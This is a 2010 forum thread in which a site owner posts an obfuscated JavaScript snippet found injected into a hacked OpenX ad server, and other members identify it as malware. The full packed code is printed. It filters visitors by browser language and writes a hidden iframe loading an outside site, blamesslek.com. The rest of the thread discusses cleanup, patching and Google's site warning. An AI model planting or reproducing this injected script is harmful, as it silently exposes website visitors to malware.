1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Can a javascript expert tell me what this is?

Discussion in 'Off Topic' started by dutchbb, Sep 8, 2010.

  1. dutchbb

    dutchbb Well-Known Member

    I think one of the scripts I'm using got hacked...

    I found this suspicious looking Javascript somewhere in an additional HTML section:

    <script language="JavaScript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 4=V;7 8=C W();4.a=\'X=o; u=/;\';2(4.a.5(\'3=t\')<=0&&4.a.5(\'1=o\')>0){Y l(h,e,g){7 6=C U(\'T\',\'v\',\'P\',\'O\',\'z\',\'r\',\'s\',\'Q\',\'R\',\'S\',\'Z\',\'n\',\'B\',\'p\',\'10\',\'w\',\'j\',\'17\',\'18\',\'19\',\'1a\',\'16\',\'15\',\'y\',\'11\',\'12\',\'N\',\'14\',\'k\',\'x\',\'q\',\'m\',\'1b\',\'n\',\'D\',\'M\',\'K\',\'L\',\'m\',\'k\',\'J\',\'I\',\'F\',\'p\',\'j\',\'E\',\'G\',\'w\',\'H\',\'q\',\'y\',\'z\',\'B\',\'x\',\'13\',\'v\',\'r\',\'s\',\'1x\',\'1F\',\'1G\',\'1H\',\'1E\',\'1D\',\'1z\',\'1c\',\'1B\',\'1C\',\'1J\',\'1I\',\'1K\',\'1R\',\'1S\',\'1T\',\'1P\',\'1L\',\'1M\',\'1N\');1O(i=0;i<6.1Q;i++){2(h&&h.c().5(6[i])!=-1)9 d;2(e&&e.c().5(6[i])!=-1)9 d;2(g&&g.c().5(6[i])!=-1)9 d}9 1y}2(l(f.1j,f.1k,f.1l)){7 b=1}2(1i b==\'1h\'){4.1d("<A 1e=\'1f://1g.1m/1n/1u\' 1v=\'0\' 1w=\'0\' 1t=\'0\'></A>")}7 b=1;8.1s(8.1o()+1p);4.a=\'1q=t; u=/; 1r=\'+8.1A()}',62,118,'||if||dc|indexOf|cou|var|date_ob|return|cookie|run|toLowerCase|true|str2|navigator|str3|str1||ma|do|clng|eg|ro||pk|hr|pl|be|llo|path|tn|dz|pt|gr|bg|iframe|ba|new|tw|pr|jo|mk|ge|dk|lt|hk|ps|al|ci|id|br|gp|my|th|gt|Array|document|Date|h1|function|iq|tr|vn|kw|si|sa|il|om|re|ae|gf|ru|qa|cz|writeln|src|http|blamesslek|undefined|typeof|systemLanguage|userLanguage|language|com|threads|getTime|86400000|h3|expires|setTime|frameborder|01|width|height|ir|false|cr|toGMTString|ec|ee|by|bo|sk|hu|az|lv|lk|md|tt|ua|uy|for|sv|length|mt|pa|rs'.split('|'),0,{}))
    Anyone who can tell me what this does or what it is?
  2. OperaManiac

    OperaManiac Well-Known Member

    running this code results in a bad site warning in chrome.

    destination? blamesslek.com

    clean up the code. it's malware. your site was probably hacked and modified.
  3. dutchbb

    dutchbb Well-Known Member

    Thanks, I just found out what you said. OpenX got hacked... Not sure how they did that. They made a new user, changed permissions and just added this code in the additional HTML.

    I password protected the admin directory with extra htaccess, hopefully this is enough. This is a pain in the *** because now the Google warning shows for every user entering my site :(

    I've already notified them that I removed the code, but I have no idea how long this will take to remove the warning.
  4. feldon30

    feldon30 Well-Known Member

    2-3 days if you ride their butt about it.
  5. OperaManiac

    OperaManiac Well-Known Member

    well yeah. it takes them a while to update it by themselves. you need to alert them through google webmaster central.
  6. dutchbb

    dutchbb Well-Known Member

    Yeah I did. Hopefully this will not take too long.

    BTW I just found out that older versions of OpenX have lots of leaks... Now upgrading to 2.8.6 hopefully this will solve the leak I'm dealing with.

Share This Page